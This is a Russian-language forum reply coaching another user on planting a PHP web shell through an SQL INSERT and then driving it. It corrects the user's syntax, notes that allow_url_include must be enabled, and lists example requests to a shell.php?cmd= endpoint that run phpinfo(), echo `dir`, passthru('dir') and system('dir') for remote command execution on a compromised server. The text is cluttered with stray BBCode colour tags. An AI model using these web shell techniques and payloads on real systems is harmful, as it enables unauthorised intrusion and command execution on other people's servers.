GroM88
В первом случае у тебя нарушен синтаксис, верный запрос выглядит так:
PHP код:
[COLOR="#000000"]INSERT INTRO `tableshell` (`shell`) VALUES ("[COLOR="#0000BB"][/COLOR]")
[/COLOR]
А если учесть, что не на всех серверах включена директива short_open_tag, то так:
PHP код:
[COLOR="#000000"]INSERT INTRO `tableshell` (`shell`) VALUES ("[COLOR="#0000BB"][/COLOR]")
[/COLOR]
Не забывай, что при таком методе залития, директива allow_url_include - должна находиться в положении On, иначе шелл не проинклудится.
Во втором случае, нарушен синтаксис и отсутствует логика.
Во первых, после команды нужна точка с запятой, например для вывода phpinfo синтаксически верным был бы такой запрос:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.site.ru/shell.php?cmd=phpinfo();
[/COLOR][/COLOR]
Во вторых, если ты собираешься вызывать системные команды, а не просто эвалить php код (команда dir, является системной командой Windows), то нужно использовать соответствующие функции, либо заключать команды в тильды (``), чтобы php понимал, что эту команду нужно выполнить, как команду оболочки.
О функциях исполнения системных команд и их различиях, можешь почитать тут
http://www.php.su/functions/?cat=exec
Вывод листинга директорий для Windows систем, c учетом кода, что ты залил, можно получить одним из следующих запросов (если конечно соответствующие функции не отключены на сервере или не включен safe mod):
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.site.ru/shell.php?cmd=echo `dir`;
[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.site.ru/shell.php?cmd=passthru('dir');
[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.site.ru/shell.php?cmd=system('dir');
[/COLOR][/COLOR]